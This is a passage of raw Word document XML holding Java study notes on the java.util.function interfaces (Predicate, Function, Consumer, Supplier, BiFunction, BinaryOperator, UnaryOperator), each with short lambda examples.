          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the java.util.function package. These interfaces are used extensively with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda expression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Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DB1D2" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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 are the most commonly used ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBBF1F" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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D24FCD3">
          <v:rect id="_x0000_i1742" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="420FEF97" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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1. Predicate&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786739E9" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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presents a condition (boolean-valued function) on a single input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25997B" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> boolean test(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DC4A5" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDDA49" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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edicate&lt;Integer&gt; isEven = x -&gt; x % 2 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC1562" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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isEven.test(4)); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D3BE7" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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F03F919">
          <v:rect id="_x0000_i1743" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FC497" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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2. Function&lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05AD20" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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akes input of type T and returns result of type R.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF570D" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R apply(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B70EE" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Use case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data transformation (e.g., map())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713820D1" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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nction&lt;String, Integer&gt; strLength = s -&gt; s.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FE146" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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strLength.apply("Java")); // 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081EAE9" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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6783B1A">
          <v:rect id="_x0000_i1744" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DB420" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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3. Consumer&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35941468" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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akes input and performs some action (no return).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF9906" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> void accept(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE3A57" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Printing or saving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C112087" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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sumer&lt;String&gt; printer = s -&gt; System.out.println("Hello, " + s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819BDE0" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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inter.accept("World"); // Hello, World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E960442" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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D803A92">
          <v:rect id="_x0000_i1745" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E0F32" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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4. Supplier&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09EC59" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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akes no input, returns a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCDD7D" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> T get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189BF01" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lazy loading / default values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7164D9" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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pplier&lt;Double&gt; randomSupplier = () -&gt; Math.random();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536D0B9" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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randomSupplier.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1EE4C" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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B53E2FC">
          <v:rect id="_x0000_i1746" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="364FB014" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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5. BiFunction&lt;T, U, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A22BA45" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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akes two arguments and returns a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150BC17" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R apply(T t, U u)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C7BB8" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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iFunction&lt;Integer, Integer, Integer&gt; add = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3338FB" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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add.apply(3, 4)); // 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DC7AF" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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C379F41">
          <v:rect id="_x0000_i1747" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77823786" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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6. BinaryOperator&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998FD4C" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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akes two inputs of the same type and returns the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A42EB" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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tends BiFunction&lt;T, T, T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F262A4F" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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inaryOperator&lt;Integer&gt; multiply = (a, b) -&gt; a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631D29F" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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multiply.apply(2, 5)); // 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069E0E7" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008865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CE58C47">
          <v:rect id="_x0000_i1748" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5A7CD" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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7. UnaryOperator&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6351EB" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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akes one input and returns a result of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A742B" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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tends Function&lt;T, T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157809F" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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naryOperator&lt;String&gt; upper = s -&gt; s.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE15ED" w14:textId="77777777" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC" w:rsidP="008865B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upper.apply("java")); // JAVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875D131" w14:textId="47CAFA94" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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861B78A">
          <v:rect id="_x0000_i1749" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CAC8D" w14:textId="2DF5FCB1" w:rsidR="00886E46" w:rsidRPr="00CE4B95" w:rsidRDefault="00886E46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Toc196307719"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="008003BE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">redicate and </w:t>
      </w:r>
      <w:r w:rsidR="008003BE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>onsumer in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="57B4867F" w14:textId="1B01B147" w:rsidR="00886E46" w:rsidRPr="00CE4B95" w:rsidRDefault="00886E46">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6058F8" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">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Predicate&lt;T&gt; – For Conditional Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014225BF" w14:textId="0DB1316F" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB58C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Represents a condition (boolean-valued function) on an object of type T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEC968" w14:textId="61C2395A" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB58C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>boolean test(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09717D64" w14:textId="731F1D37" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB58C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Filtering, validations, condition checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E425C4" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">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64BEBF79" w14:textId="77777777" w:rsidR="0072014F" w:rsidRPr="00CE4B95" w:rsidRDefault="007201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1055963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Predicate</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isLongerThan5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st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p>
    <w:p w14:paraId="04C463E5" w14:textId="77777777" w:rsidR="0072014F" w:rsidRPr="00CE4B95" w:rsidRDefault="007201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1055963"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3900FC" w14:textId="77777777" w:rsidR="0072014F" w:rsidRPr="00CE4B95" w:rsidRDefault="007201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1055963"/>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LongerThan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es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ell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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BC372" w14:textId="1847890B" w:rsidR="0072014F" w:rsidRPr="00CE4B95" w:rsidRDefault="007201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1055963"/>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LongerThan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es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Welco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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5A400" w14:textId="5CEB503A" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6879FB" w14:textId="77777777" w:rsidR="00CE4630" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE4630" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD17900" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">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nsumer&lt;T&gt; – For Performing an Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BEF82" w14:textId="72DAD8F5" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7D66" w:rsidRPr="00CE4B95">
        <w:rPr>
